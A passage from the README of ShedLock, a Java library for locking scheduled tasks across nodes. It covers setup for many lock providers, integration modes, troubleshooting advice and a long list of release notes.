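Concretely, each lock becomes a child node of that root, so a lock named `reportJob` ends up at `/shedlock/reportJob`. A minimal sketch of that mapping (the helper below is hypothetical, not part of the ShedLock API):

```java
public class ZkLockPaths {
    // Hypothetical helper illustrating the default layout described above:
    // one znode per lock name under the /shedlock root.
    static String lockNodePath(String root, String lockName) {
        return root + "/" + lockName;
    }

    public static void main(String[] args) {
        System.out.println(lockNodePath("/shedlock", "reportJob")); // /shedlock/reportJob
    }
}
```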
#### Redis (using Spring RedisConnectionFactory)
Import
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-redis-spring</artifactId>
    <version>5.13.0</version>
</dependency>
```

and configure

```java
import net.javacrumbs.shedlock.provider.redis.spring.RedisLockProvider;
import org.springframework.data.redis.connection.RedisConnectionFactory;

...

@Bean
public LockProvider lockProvider(RedisConnectionFactory connectionFactory) {
    return new RedisLockProvider(connectionFactory, ENV);
}
```

#### Redis (using Spring ReactiveRedisConnectionFactory)
Import
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-redis-spring</artifactId>
    <version>5.13.0</version>
</dependency>
```

and configure

```java
import net.javacrumbs.shedlock.provider.redis.spring.ReactiveRedisLockProvider;
import org.springframework.data.redis.connection.ReactiveRedisConnectionFactory;

...

@Bean
public LockProvider lockProvider(ReactiveRedisConnectionFactory connectionFactory) {
    return new ReactiveRedisLockProvider.Builder(connectionFactory)
        .environment(ENV)
        .build();
}
```

Redis lock provider uses classical lock mechanism as described [here](https://redis.io/commands/setnx#design-pattern-locking-with-codesetnxcode)
which may not be reliable in case of Redis master failure.

#### Redis (using Jedis)
Import
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-redis-jedis4</artifactId>
    <version>5.13.0</version>
</dependency>
```

and configure

```java
import net.javacrumbs.shedlock.provider.redis.jedis.JedisLockProvider;

...

@Bean
public LockProvider lockProvider(JedisPool jedisPool) {
    return new JedisLockProvider(jedisPool, ENV);
}
```

#### Hazelcast
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-hazelcast4</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.hazelcast4.HazelcastLockProvider;

...
@Bean
public HazelcastLockProvider lockProvider(HazelcastInstance hazelcastInstance) {
    return new HazelcastLockProvider(hazelcastInstance);
}
```

#### Couchbase
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-couchbase-javaclient3</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.couchbase.javaclient.CouchbaseLockProvider;

...

@Bean
public CouchbaseLockProvider lockProvider(Bucket bucket) {
    return new CouchbaseLockProvider(bucket);
}
```

For Couchbase 3 use `shedlock-provider-couchbase-javaclient3` module and `net.javacrumbs.shedlock.provider.couchbase3` package.

#### Elasticsearch
I am really not sure it's a good idea to use Elasticsearch as a lock provider. But if you have no other choice, you can. Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-elasticsearch8</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.elasticsearch8.ElasticsearchLockProvider;

...

@Bean
public ElasticsearchLockProvider lockProvider(ElasticsearchClient client) {
    return new ElasticsearchLockProvider(client);
}
```

#### OpenSearch
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-opensearch</artifactId>
    <version>4.36.1</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.opensearch.OpenSearchLockProvider;

...
@Bean
public OpenSearchLockProvider lockProvider(RestHighLevelClient highLevelClient) {
    return new OpenSearchLockProvider(highLevelClient);
}
```

#### CosmosDB
CosmosDB support is provided by a third-party module available [here](https://github.com/jesty/shedlock-provider-cosmosdb)


#### Cassandra
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-cassandra</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.cassandra.CassandraLockProvider;
import net.javacrumbs.shedlock.provider.cassandra.CassandraLockProvider.Configuration;

...

@Bean
public CassandraLockProvider lockProvider(CqlSession cqlSession) {
    return new CassandraLockProvider(Configuration.builder().withCqlSession(cqlSession).withTableName("lock").build());
}
```

Example for creating default keyspace and table in a local Cassandra instance:
```sql
CREATE KEYSPACE shedlock with replication={'class':'SimpleStrategy', 'replication_factor':1} and durable_writes=true;
CREATE TABLE shedlock.lock (name text PRIMARY KEY, lockUntil timestamp, lockedAt timestamp, lockedBy text);
```

Please note that CassandraLockProvider uses Cassandra driver v4, which is part of Spring Boot since 2.3.

#### Consul
ConsulLockProvider has one limitation: the lockAtMostFor setting has a minimum value of 10 seconds. This is dictated by Consul's session limitations.

Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-consul</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.consul.ConsulLockProvider;

...
@Bean // for Micronaut, please define the preDestroy property: @Bean(preDestroy="close")
public ConsulLockProvider lockProvider(com.ecwid.consul.v1.ConsulClient consulClient) {
    return new ConsulLockProvider(consulClient);
}
```

Please note that the Consul lock provider uses the [ecwid consul-api client](https://github.com/Ecwid/consul-api), which is part of the Spring Cloud Consul integration (the `spring-cloud-starter-consul-discovery` package).

#### ArangoDB
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-arangodb</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.arangodb.ArangoLockProvider;

...

@Bean
public ArangoLockProvider lockProvider(final ArangoOperations arangoTemplate) {
    return new ArangoLockProvider(arangoTemplate.driver().db(DB_NAME));
}
```

Please note that the ArangoDB lock provider uses ArangoDB driver v6.7, which is part of [arango-spring-data](https://github.com/arangodb/spring-data) in version 3.3.0.

#### Neo4j
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-neo4j</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:
```java
import net.javacrumbs.shedlock.provider.neo4j.Neo4jLockProvider;

...

@Bean
Neo4jLockProvider lockProvider(org.neo4j.driver.Driver driver) {
    return new Neo4jLockProvider(driver);
}
```

Please make sure that the `neo4j-java-driver` version used by `shedlock-provider-neo4j` matches the driver version used in your
project (if you use `spring-boot-starter-data-neo4j`, it is probably provided transitively).

#### Etcd
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-etcd-jetcd</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.etcd.jetcd.EtcdLockProvider;

...
@Bean
public LockProvider lockProvider(Client client) {
    return new EtcdLockProvider(client);
}
```


#### Apache Ignite
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-ignite</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.ignite.IgniteLockProvider;

...

@Bean
public LockProvider lockProvider(Ignite ignite) {
    return new IgniteLockProvider(ignite);
}
```

#### In-Memory
If you want to use a lock provider in tests, there is an in-memory implementation.

Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-inmemory</artifactId>
    <version>5.13.0</version>
    <scope>test</scope>
</dependency>
```

```java
import net.javacrumbs.shedlock.provider.inmemory.InMemoryLockProvider;

...

@Bean
public LockProvider lockProvider() {
    return new InMemoryLockProvider();
}
```

#### Memcached (using spymemcached)
Please be aware that memcached is not a database but a cache. It means that if the cache is full,
[the lock may be released prematurely](https://stackoverflow.com/questions/6868256/memcached-eviction-prior-to-key-expiry/10456364#10456364).
**Use only if you know what you are doing.**

Import
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-memcached-spy</artifactId>
    <version>5.13.0</version>
</dependency>
```

and configure

```java
import net.javacrumbs.shedlock.provider.memcached.spy.MemcachedLockProvider;

...

@Bean
public LockProvider lockProvider(net.spy.memcached.MemcachedClient client) {
    return new MemcachedLockProvider(client, ENV);
}
```

P.S.:

Memcached standard protocol:
- A key: an arbitrary string up to 250 bytes in length (no spaces or newlines for ASCII mode)
- An expiration time, in seconds. `0` means never expire. Can be up to 30 days. After 30 days, it is treated as a unix timestamp of an exact date.
  (supports `seconds`, `minutes` and `days`, for less than `30` days)


#### Datastore

Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-datastore</artifactId>
    <version>5.13.0</version>
</dependency>
```

and configure
```java
import net.javacrumbs.shedlock.provider.datastore.DatastoreLockProvider;

...

@Bean
public LockProvider lockProvider(com.google.cloud.datastore.Datastore datastore) {
    return new DatastoreLockProvider(datastore);
}
```

#### Spanner
Import the project
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-spanner</artifactId>
    <version>5.13.0</version>
</dependency>
```
Configure
```java
import net.javacrumbs.shedlock.provider.spanner.SpannerLockProvider;

...

// Basic
@Bean
public LockProvider lockProvider(DatabaseClient databaseClient) {
    return new SpannerLockProvider(databaseClient);
}

// Custom host, table and column names
@Bean
public LockProvider lockProvider(DatabaseClient databaseClient) {
    var config = SpannerLockProvider.Configuration.builder()
        .withDatabaseClient(databaseClient)
        .withTableConfiguration(SpannerLockProvider.TableConfiguration.builder()
            ...
            // Custom table and column names
            .build())
        .withHostName("customHostName")
        .build();

    return new SpannerLockProvider(config);
}
```


## Multi-tenancy
If you have a multi-tenancy use-case, you can use a lock provider similar to this one
(see the full [example](https://github.com/lukas-krecan/ShedLock/blob/master/providers/jdbc/shedlock-provider-jdbc-template/src/test/java/net/javacrumbs/shedlock/provider/jdbctemplate/MultiTenancyLockProviderIntegrationTest.java#L87))
```java
private static abstract class MultiTenancyLockProvider implements LockProvider {
    private final ConcurrentHashMap<String, LockProvider> providers = new ConcurrentHashMap<>();

    @Override
    public @NonNull Optional<SimpleLock> lock(@NonNull LockConfiguration lockConfiguration) {
        String tenantName = getTenantName(lockConfiguration);
        return providers.computeIfAbsent(tenantName, this::createLockProvider).lock(lockConfiguration);
    }

    protected abstract LockProvider createLockProvider(String tenantName);

    protected abstract String getTenantName(LockConfiguration lockConfiguration);
}
```

## Customization
You can customize the behavior of the library by implementing the `LockProvider` interface. Let's say you want to implement
a special behavior after a lock is obtained.
You can do it like this:

```java
public class MyLockProvider implements LockProvider {
    private final LockProvider delegate;

    public MyLockProvider(LockProvider delegate) {
        this.delegate = delegate;
    }

    @Override
    public Optional<SimpleLock> lock(LockConfiguration lockConfiguration) {
        Optional<SimpleLock> lock = delegate.lock(lockConfiguration);
        if (lock.isPresent()) {
            // do something
        }
        return lock;
    }
}
```

## Duration specification
All the annotations where you need to specify a duration support the following formats

* duration+unit - `1s`, `5ms`, `5m`, `1d` (since 4.0.0)
* duration in ms - `100` (only Spring integration)
* ISO-8601 - `PT15M` (see [Duration.parse()](https://docs.oracle.com/javase/8/docs/api/java/time/Duration.html#parse-java.lang.CharSequence-) documentation)

## Extending the lock
There are some use-cases which require extending a currently held lock. You can use the LockExtender in the
following way:

```java
LockExtender.extendActiveLock(Duration.ofMinutes(5), ZERO);
```

Please note that not all lock provider implementations support lock extension.

## KeepAliveLockProvider
There is also a KeepAliveLockProvider that is able to keep the lock alive by periodically extending it. It can be
used by wrapping the original lock provider. My personal opinion is that it should be used only in special cases:
it adds more complexity to the library and the flow is harder to reason about, so please use it sparingly.

```java
@Bean
public LockProvider lockProvider(...) {
    return new KeepAliveLockProvider(new XyzProvider(...), scheduler);
}
```
KeepAliveLockProvider extends the lock in the middle of the lockAtMostFor interval. For example, if lockAtMostFor
is 10 minutes, the lock is extended every 5 minutes for 10 minutes until the lock is released. Please note that the minimal
lockAtMostFor time supported by this provider is 30s. The scheduler is used only for the lock extension; a single thread
should be enough.
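The extension schedule described above is simple arithmetic: the lock is extended at half of `lockAtMostFor`, each time for the full `lockAtMostFor`. A sketch of that timing (not ShedLock's internal code):

```java
import java.time.Duration;

public class KeepAliveTiming {
    // Per the text: the lock is extended in the middle of the lockAtMostFor interval,
    // so the extension period is lockAtMostFor / 2.
    static Duration extensionPeriod(Duration lockAtMostFor) {
        return lockAtMostFor.dividedBy(2);
    }

    public static void main(String[] args) {
        // lockAtMostFor = 10 minutes -> extended every 5 minutes
        System.out.println(extensionPeriod(Duration.ofMinutes(10))); // PT5M
    }
}
```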
## Micronaut integration
Since version 4.0.0, it's possible to use the Micronaut framework for integration.

Import the project:
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-micronaut</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure default lockAtMostFor value (application.yml):
```yaml
shedlock:
  defaults:
    lock-at-most-for: 1m
```

Configure lock provider:
```java
@Singleton
public LockProvider lockProvider() {
    ... select and configure your lock provider
}
```

Configure the scheduled task:
```java
@Scheduled(fixedDelay = "1s")
@SchedulerLock(name = "myTask")
public void myTask() {
    assertLocked();
    ...
}
```

## CDI integration
Since version 5.0.0, it's possible to use CDI for integration (tested only with Quarkus).

Import the project:
```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-cdi</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure default lockAtMostFor value (application.properties):
```properties
shedlock.defaults.lock-at-most-for=PT30S
```

Configure lock provider:
```java
@Produces
@Singleton
public LockProvider lockProvider() {
    ...
}
```

Configure the scheduled task:
```java
@Scheduled(every = "1s")
@SchedulerLock(name = "myTask")
public void myTask() {
    assertLocked();
    ...
}
```

The implementation only depends on `jakarta.enterprise.cdi-api` and `microprofile-config-api`, so it should be
usable in other CDI compatible frameworks, but it has not been tested with anything else than Quarkus.

The support is minimalistic; for example, there is no support for expressions in the annotation parameters yet.
If you need it, feel free to send a PR.

## Locking without a framework
It is possible to use ShedLock without a framework

```java
LockingTaskExecutor executor = new DefaultLockingTaskExecutor(lockProvider);

...
Instant lockAtMostUntil = Instant.now().plusSeconds(600);
executor.executeWithLock(runnable, new LockConfiguration("lockName", lockAtMostUntil));

```

## Extending the lock
Some lock providers support extension of the lock. For the time being, it requires manual lock manipulation,
directly using `LockProvider` and calling the `extend` method on the `SimpleLock`.

## Modes of Spring integration
ShedLock supports two modes of Spring integration. One that uses an AOP proxy around the scheduled method (PROXY_METHOD)
and one that proxies the TaskScheduler (PROXY_SCHEDULER).

#### Scheduled Method proxy
Since version 4.0.0, the default mode of Spring integration is an AOP proxy around the annotated method.

The main advantage of this mode is that it plays well with other frameworks that want to somehow alter the default Spring scheduling mechanism.
The disadvantage is that the lock is applied even if you call the method directly. If the method returns a value and the lock is held
by another process, null or an empty Optional will be returned (primitive return types are not supported).

Final and non-public methods are not proxied, so either you have to make your scheduled methods public and non-final or use the TaskScheduler proxy.

![Method proxy sequence diagram](https://github.com/lukas-krecan/ShedLock/raw/master/documentation/method_proxy.png)

#### TaskScheduler proxy
This mode wraps Spring's `TaskScheduler` in an AOP proxy. **This mode does not play well with instrumentation libraries**
like OpenTelemetry that also wrap the TaskScheduler. Please only use it if you know what you are doing.
It can be switched on like this (PROXY_SCHEDULER was the default mode before 4.0.0):

```java
@EnableSchedulerLock(interceptMode = PROXY_SCHEDULER)
```

If you do not specify your task scheduler, a default one is created for you.
If you have special needs, just create a bean implementing the `TaskScheduler`
interface and it will get wrapped into the AOP proxy automatically.

```java
@Bean
public TaskScheduler taskScheduler() {
    return new MySpecialTaskScheduler();
}
```

Alternatively, you can define a bean of type `ScheduledExecutorService` and it will automatically get used by the task
scheduling mechanism.

![TaskScheduler proxy sequence diagram](https://github.com/lukas-krecan/ShedLock/raw/master/documentation/scheduler_proxy.png)

### Spring XML configuration
Spring XML configuration is not supported as of version 3.0.0. If you need it, please use version 2.6.0 or file an issue explaining why it is needed.

## Lock assert
To prevent misconfiguration errors, like AOP misconfiguration, a missing annotation etc., you can assert that the lock
works by using LockAssert:

```java
@Scheduled(...)
@SchedulerLock(...)
public void scheduledTask() {
    // To assert that the lock is held (prevents misconfiguration errors)
    LockAssert.assertLocked();
    // do something
}
```

In unit tests you can switch off the assertion by calling `LockAssert.TestHelper.makeAllAssertsPass(true)` on the given thread (as in this [example](https://github.com/lukas-krecan/ShedLock/commit/e8d63b7c56644c4189e0a8b420d8581d6eae1443)).

## Kotlin gotchas
The library is tested with Kotlin and works fine. The only issue is Spring AOP, which does not work on final methods. If you use `@SchedulerLock` with the `@Component`
annotation, everything should work since the Kotlin Spring compiler plugin will automatically 'open' the method for you. If the `@Component` annotation is not present, you
have to open the method yourself (see [this issue](https://github.com/lukas-krecan/ShedLock/issues/1268) for more details).

## Caveats
Locks in ShedLock have an expiration time, which leads to the following possible issues.
1. If the task runs longer than `lockAtMostFor`, the task can be executed more than once
2.
If the clock difference between two nodes is more than `lockAtLeastFor` or the minimal execution time, the task can be
executed more than once.

## Troubleshooting
Help, ShedLock does not do what it's supposed to do!

1. Upgrade to the newest version
2. Use [LockAssert](https://github.com/lukas-krecan/ShedLock#lock-assert) to ensure that AOP is correctly configured.
   - If it does not work, please read about Spring AOP internals (for example [here](https://docs.spring.io/spring-framework/docs/current/reference/html/core.html#aop-proxying))
3. Check the storage. If you are using JDBC, check the ShedLock table. If it's empty, ShedLock is not properly configured.
If there is more than one record with the same name, you are missing a primary key.
4. Use the ShedLock debug log. ShedLock logs interesting information on DEBUG level with the logger name `net.javacrumbs.shedlock`.
It should help you to see what's going on.
5. For short-running tasks consider using `lockAtLeastFor`. If the tasks are short-running, they could be executed one
after another; `lockAtLeastFor` can prevent it.
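Point 5 can be illustrated numerically: with `lockAtLeastFor`, the lock is held until the later of task completion and `lockedAt + lockAtLeastFor`, so a quick task cannot be re-run immediately on another node. A sketch of that rule (not ShedLock's actual implementation):

```java
import java.time.Duration;
import java.time.Instant;

public class LockAtLeastForDemo {
    // Sketch: the lock stays held until max(taskEnd, lockedAt + lockAtLeastFor).
    static Instant lockedUntil(Instant lockedAt, Instant taskEnd, Duration lockAtLeastFor) {
        Instant atLeast = lockedAt.plus(lockAtLeastFor);
        return taskEnd.isAfter(atLeast) ? taskEnd : atLeast;
    }

    public static void main(String[] args) {
        Instant lockedAt = Instant.parse("2024-01-01T00:00:00Z");
        // The task finishes after one second, but the lock is kept for the full 30s,
        // preventing an immediate back-to-back run on another node.
        System.out.println(lockedUntil(lockedAt, lockedAt.plusSeconds(1), Duration.ofSeconds(30)));
        // 2024-01-01T00:00:30Z
    }
}
```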
# Release notes
## 5.13.0 (2024-04-05)
* #1779 Ability to rethrow unexpected exception in JdbcTemplateStorageAccessor
* Dependency updates

## 5.12.0 (2024-02-29)
* #1800 Enable lower case for database type when using usingDbTime()
* #1804 Startup error with Neo4j 5.17.0
* Dependency updates

## 4.47.0 (2024-03-01)
* #1800 Enable lower case for database type when using usingDbTime() (thanks @yuagu1)

## 5.11.0 (2024-02-13)
* #1753 Fix SpEL for methods with parameters
* Dependency updates

## 5.10.2 (2023-12-07)
* #1635 fix makeAllAssertsPass locks only once
* Dependency updates

## 5.10.1 (2023-12-06)
* #1635 fix makeAllAssertsPass(false) throws NoSuchElementException
* Dependency updates

## 5.10.0 (2023-11-07)
* SpannerLockProvider added (thanks @pXius)
* Dependency updates

## 5.9.1 (2023-10-19)
* QuarkusRedisLockProvider supports Redis 6.2 (thanks @ricardojlrufino)

## 5.9.0 (2023-10-15)
* Support Quarkus 2 Redis client (thanks @ricardojlrufino)
* Better handling of timeouts in ReactiveStreamsMongoLockProvider
* Dependency updates

## 5.8.0 (2023-09-15)
* Support for Micronaut 4
* Use Merge instead of Insert for Oracle #1528 (thanks @xmojsic)
* Dependency updates

## 5.7.0 (2023-08-25)
* JedisLockProvider supports extending (thanks @shotmk)
* Better behavior when locks are nested #1493

## 4.46.0 (2023-09-05)
* JedisLockProvider (version 3) supports extending (thanks @shotmk)

## 4.45.0 (2023-09-04)
* JedisLockProvider supports extending (thanks @shotmk)

## 5.6.0
* Ability to explicitly set database product in JdbcTemplateLockProvider (thanks @metron2)
* Removed forgotten versions from BOM
* Dependency updates

## 5.5.0 (2023-06-19)
* Datastore support (thanks @mmastika)
* Dependency updates

## 5.4.0 (2023-06-06)
* Handle [uncategorized SQL exceptions](https://github.com/lukas-krecan/ShedLock/pull/1442) (thanks @jaam)
* Dependency updates

## 5.3.0 (2023-05-13)
* Added shedlock-cdi module
(supports the newest CDI version)
* Dependency updates

## 5.2.0 (2023-03-06)
* Uppercase in JdbcTemplateProvider (thanks @Ragin-LundF)
* Dependency updates

## 5.1.0 (2023-01-07)
* Added SpEL support to @SchedulerLock name attribute (thanks @ipalbeniz)
* Dependency updates

## 5.0.1 (2022-12-10)
* Work around broken Spring 6 exception translation https://github.com/lukas-krecan/ShedLock/issues/1272

## 4.44.0 (2022-12-29)
* Insert ignore for MySQL https://github.com/lukas-krecan/ShedLock/commit/8a4ae7ad8103bb47f55d43bccf043ca261c24d7a

## 5.0.0 (2022-12-10)
* Requires JDK 17
* Tested with Spring 6 (Spring Boot 3)
* Micronaut updated to 3.x.x
* R2DBC 1.x.x (still sucks)
* Spring Data 3.x.x
* Rudimentary support for CDI (tested with Quarkus)
* New jOOQ lock provider
* SLF4J 2
* Deleted all deprecated code and support for old versions of libraries

## 4.43.0 (2022-12-04)
* Better logging in JdbcTemplateProvider
* Dependency updates

## 4.42.0 (2022-09-16)
* Deprecate old Couchbase lock provider
* Dependency updates

## 4.41.0 (2022-08-17)
* Couchbase collection support (thanks @mesuutt)
* Dependency updates

## 4.40.0 (2022-08-11)
* Fixed caching issues when the app is started but the DB does not exist yet (#1129)
* Dependency updates

## 4.39.0 (2022-07-26)
* Introduced elasticsearch8 LockProvider and deprecated the original one (thanks @MarAra)
* Dependency updates

## 4.38.0 (2022-07-02)
* ReactiveRedisLockProvider added (thanks @ericwcc)
* Dependency updates

## 4.37.0 (2022-06-14)
* OpenSearch provider (thanks @Pinny3)
* Fix wrong reference to reactive Mongo in BOM #1048
* Dependency updates

## 4.36.0 (2022-05-28)
* shedlock-bom module added
* Dependency updates

## 4.35.0 (2022-05-16)
* Neo4j allows to specify database (thanks @SergeyPlatonov)
* Dependency updates

## 4.34.0 (2022-04-09)
* Dropped support for Hazelcast <= 3 as it has an unfixed vulnerability
* Dropped support for Spring Data Redis 1 as
it is not supported
* Dependency updates

## 4.33.0
* memcached provider added (thanks @pinkhello)
* Dependency updates

## 4.32.0
* JDBC provider does not change autocommit attribute
* Dependency updates

## 4.31.0
* Jedis 4 lock provider
* Dependency updates

## 4.30.0
* In-memory lock provider added (thanks @kkocel)

## 4.29.0
* R2DBC support added (thanks @sokomishalov)
* Library upgrades

## 4.28.0
* Neo4j lock provider added (thanks @thimmwork)
* Library upgrades

## 4.27.0
* Ability to set transaction isolation in JdbcTemplateLockProvider
* Library upgrades

## 4.26.0
* KeepAliveLockProvider introduced
* Library upgrades

## 4.25.0
* LockExtender added

## 4.24.0
* Support for Apache Ignite (thanks @wirtsleg)
* Library upgrades

## 4.23.0
* Ability to set serialConsistencyLevel in Cassandra (thanks @DebajitKumarPhukan)
* Introduced shedlock-provider-jdbc-micronaut module (thanks @drmaas)

## 4.22.1
* Catching and logging Cassandra exception

## 4.22.0
* Support for custom keyspace in Cassandra provider

## 4.21.0
* Elastic unlock using IMMEDIATE refresh policy #422
* DB2 JDBC lock provider uses microseconds in DB time
* Various library upgrades

## 4.20.1
* Fixed DB JDBC server time #378

## 4.20.0
* Support for etcd (thanks @grofoli)

## 4.19.1
* Fixed devtools compatibility #368

## 4.19.0
* Support for enhanced configuration in Cassandra provider (thanks @DebajitKumarPhukan)
* LockConfigurationExtractor exposed as a Spring bean #359
* Handle CannotSerializeTransactionException #364

## 4.18.0
* Fixed Consul support for tokens and added enhanced Consul configuration (thanks @DrWifey)

## 4.17.0
* Consul support for tokens

## 4.16.0
* Spring - EnableSchedulerLock.order param added to specify AOP proxy order
* JDBC - Log unexpected exceptions at ERROR level
* Hazelcast upgraded to 4.1

## 4.15.1
* Fix session leak in Consul provider #340 (thanks
@haraldpusch)

## 4.15.0
* ArangoDB lock provider added (thanks @patrick-birkle)

## 4.14.0
* Support for Couchbase 3 driver (thanks @blitzenzzz)
* Removed forgotten configuration files from micronaut package (thanks @drmaas)
* Shutdown hook for Consul (thanks @kaliy)

## 4.13.0
* Support for Consul (thanks @kaliy)
* Various dependencies updated
* Deprecated default LockConfiguration constructor

## 4.12.0
* Lazy initialization of SqlStatementsSource #258

## 4.11.1
* MongoLockProvider uses mongodb-driver-sync
* Removed deprecated constructors from MongoLockProvider

## 4.10.1
* New Mongo reactive streams driver (thanks @codependent)

## 4.9.3
* Fixed JdbcTemplateLockProvider usingDbTime() locking #244 (thanks @gjorgievskivlatko)

## 4.9.2
* Do not fail on DB type determining code if DB connection is not available

## 4.9.1
* Support for server time in DB2
* Removed shedlock-provider-jdbc-internal module

## 4.9.0
* Support for server time in JdbcTemplateLockProvider
* Using custom non-null annotations
* Trimming time precision to milliseconds
* Micronaut upgraded to 1.3.4
* Add automatic DB tests for Oracle, MariaDB and MS SQL

## 4.8.0
* DynamoDB 2 module introduced (thanks Mark Egan)
* JDBC template code refactored to not log error on failed insert in Postgres
    * INSERT ..
ON CONFLICT UPDATE is used for Postgres

## 4.7.1
* Make LockAssert.TestHelper public

## 4.7.0
* New module for Hazelcast 4
* Ability to switch off LockAssert in unit tests

## 4.6.0
* Support for meta-annotations and annotation inheritance in Spring

## 4.5.2
* Made compatible with PostgreSQL JDBC Driver 42.2.11

## 4.5.1
* Inject redis template

## 4.5.0
* ClockProvider introduced
* MongoLockProvider(MongoDatabase) introduced

## 4.4.0
* Support for non-void returning methods when PROXY_METHOD interception is used

## 4.3.1
* Introduced shedlock-provider-redis-spring-1 to work around Spring Data Redis 1 issue #105 (thanks @rygh4775)

## 4.3.0
* Jedis dependency upgraded to 3.2.0
* Support for JedisCluster
* Tests upgraded to JUnit 5

## 4.2.0
* Cassandra provider (thanks @mitjag)

## 4.1.0
* More configuration options for JdbcTemplateProvider

## 4.0.4
* Allow configuration of key prefix in RedisLockProvider #181 (thanks @krm1312)

## 4.0.3
* Fixed junit dependency scope #179

## 4.0.2
* Fix NPE caused by Redisson #178

## 4.0.1
* DefaultLockingTaskExecutor made reentrant #175

## 4.0.0
Version 4.0.0 is a major release changing quite a lot of stuff
* `net.javacrumbs.shedlock.core.SchedulerLock` has been replaced by `net.javacrumbs.shedlock.spring.annotation.SchedulerLock`. The original annotation was in the wrong module and
was too complex. Please use the new annotation; the old one still works, but in a few years it will be removed.
* Default intercept mode changed from `PROXY_SCHEDULER` to `PROXY_METHOD`. The reason is that there were a lot of issues with `PROXY_SCHEDULER` (for example #168). You can still
use `PROXY_SCHEDULER` mode if you specify it manually.
* Support for more readable [duration strings](#duration-specification)
* Support for lock assertion `LockAssert.assertLocked()`
* [Support for Micronaut](#micronaut-integration) added

## 3.0.1
* Fixed bean definition configuration #171

## 3.0.0
* `EnableSchedulerLock.mode` renamed to `interceptMode`
* Use standard Spring AOP configuration to honor Spring Boot config (supports `proxyTargetClass` flag)
* Removed deprecated SpringLockableTaskSchedulerFactoryBean and related classes
* Removed support for XML configuration

## 2.6.0
* Updated dependency to Spring 2.1.9
* Support for lock extensions (beta)

## 2.5.0
* Zookeeper supports *lockAtMostFor* and *lockAtLeastFor* params
* Better debug logging

## 2.4.0
* Fixed potential deadlock in Hazelcast (thanks @HubertTatar)
* Finding class level annotation in proxy method mode (thanks @volkovs)
* ScheduledLockConfigurationBuilder deprecated

## 2.3.0
* LockProvider is initialized lazily so it does not change DataSource initialization order

## 2.2.1
* MongoLockProvider accepts MongoCollection as a constructor param

## 2.2.0
* DynamoDBLockProvider added

## 2.1.0
* MongoLockProvider rewritten to use upsert
* ElasticsearchLockProvider added

## 2.0.1
* AOP proxy and annotation configuration support

## 1.3.0
* Can set timezone for JdbcTemplateLock provider

## 1.2.0
* Support for Couchbase (thanks to @MoranVaisberg)

## 1.1.1
* Spring RedisLockProvider refactored to use RedisTemplate

## 1.1.0
* Support for transaction manager in JdbcTemplateLockProvider (thanks to @grmblfrz)

## 1.0.0
* Upgraded dependencies to Spring 5 and Spring Data 2
* Removed deprecated net.javacrumbs.shedlock.provider.jedis.JedisLockProvider (use net.javacrumbs.shedlock.provider.redis.jedis.JedisLockProvider instead)
* Removed deprecated SpringLockableTaskSchedulerFactory (use ScheduledLockConfigurationBuilder instead)

## 0.18.2
* Ability to clean lock cache

## 0.18.1
*
shedlock-provider-redis-spring made compatible with spring-data-redis 1.x.x
-
-## 0.18.0
-* Added shedlock-provider-redis-spring (thanks to @siposr)
-* shedlock-provider-jedis moved to shedlock-provider-redis-jedis
-
-## 0.17.0
-* Support for SpEL in lock name annotation
-
-## 0.16.1
-* Automatically closing TaskExecutor on Spring shutdown
-
-## 0.16.0
-* Removed spring-test from shedlock-spring compile time dependencies
-* Added Automatic-Module-Names
-
-## 0.15.1
-* Hazelcast works with remote cluster
-
-## 0.15.0
-* Fixed ScheduledLockConfigurationBuilder interfaces #32
-* Hazelcast code refactoring
-
-## 0.14.0
-* Support for Hazelcast (thanks to @peyo)
-
-## 0.13.0
-* Jedis constructor made more generic (thanks to @mgrzeszczak)
-
-## 0.12.0
